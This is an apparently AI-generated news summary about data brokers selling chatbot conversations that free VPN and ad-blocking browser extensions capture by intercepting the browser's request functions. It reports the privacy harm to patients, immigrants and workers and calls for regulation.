Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

Data Brokers are Selling Access to Sensitive Personal Data Captured During Chatbot Conversations



Data brokers are selling access to sensitive personal data captured during chatbot conversations, raising concerns about user privacy and security. A recent report highlights the potential risks of using free VPNs and other browser extensions that may be harvesting personal data, and calls for greater awareness and education among users. The industry's need for regulation and transparency has never been more pressing.

  • Data brokers are selling access to sensitive personal data captured during chatbot conversations.
  • Free VPNs and browser extensions can intercept users' communications with AI services, capturing sensitive information.
  • Conversations involving sensitive topics like medical records, immigration status, and personal details can be accessed by customers of data brokers.
  • The use of free VPNs and third-party services to access chatbots raises concerns about user privacy and security.



  • The recent revelation that data brokers are selling access to sensitive personal data captured during chatbot conversations has sent shockwaves through the tech community, highlighting the need for greater transparency and regulation in the industry. According to a report by Lee S Dryburgh, an expert in AI visibility for consumer health and longevity brands, these data brokers have been capturing user interactions with popular AI chatbots like ChatGPT, Gemini, Claude, and DeepSeek, and selling them to authenticated customers.

    The process of data harvesting is often carried out through browser extensions that claim to offer free VPN service or ad blocking capabilities. However, these extensions silently intercept users' communications with AI services, overriding the browser's native fetch() and XMLHttpRequest() functions to capture every prompt and response. This allows the data brokers to collect sensitive information such as names, dates of birth, medical record numbers, diagnosis codes, and even clinical HIPAA notes.

    The report details how customers of these data brokers can search and find conversations about suicide, medical records that may enable identification, HIV lab results, abortion clinic searches, immigration status disclosures, domestic violence narratives, and children's conversations. This raises serious legal risk in the current political climate, particularly for undocumented immigrants and asylum seekers who have posed questions to chatbots about their legal status.

    The study also reveals that a significant portion of these conversations involve people pasting internal corporate information into chatbots for rewrites and summaries. Furthermore, remote workers doing work for Western clients may rely on third-party services that sell groups of people access to a single chatbot account, as they cannot afford to pay for a single subscription.

    The use of free VPNs by these data brokers is particularly concerning, as it highlights the ease with which sensitive information can be captured and sold. The report cites examples of conversations that reveal real names, dates of birth, medical records, and even diagnosis codes, all of which are verbatim and searchable in a commercial database.

    The fact that healthcare workers are pasting real patient data into AI chatbots, only to have it become a commercial database is particularly alarming. This highlights the need for greater regulation and oversight in the industry, as well as greater transparency from companies about their data handling practices.

    In response to these concerns, Lee S Dryburgh has called for greater awareness and education among users about the potential risks of using free VPNs and other browser extensions that may be harvesting their personal data. He also emphasizes the need for companies to prioritize user privacy and security, particularly in the context of AI-powered chatbots.

    Ultimately, the revelation that data brokers are selling access to sensitive personal data captured during chatbot conversations raises important questions about the ethics of collecting and using user data. As we move forward with the increasing adoption of AI technology, it is essential that we prioritize user privacy and security, as well as transparency and regulation in the industry.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Data-Brokers-are-Selling-Access-to-Sensitive-Personal-Data-Captured-During-Chatbot-Conversations-ehn.shtml

  • https://go.theregister.com/feed/www.theregister.com/2026/03/03/chatbot_data_harvesting_personal_info/

  • https://www.theregister.com/2026/03/03/chatbot_data_harvesting_personal_info/

  • https://innovirtuoso.com/cybersecurity/the-underground-world-of-data-brokers-how-your-personal-info-gets-sold-and-how-to-fight-back/


  • Published: Tue Mar 3 15:41:28 2026 by llama3.2 3B Q4_K_M













    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us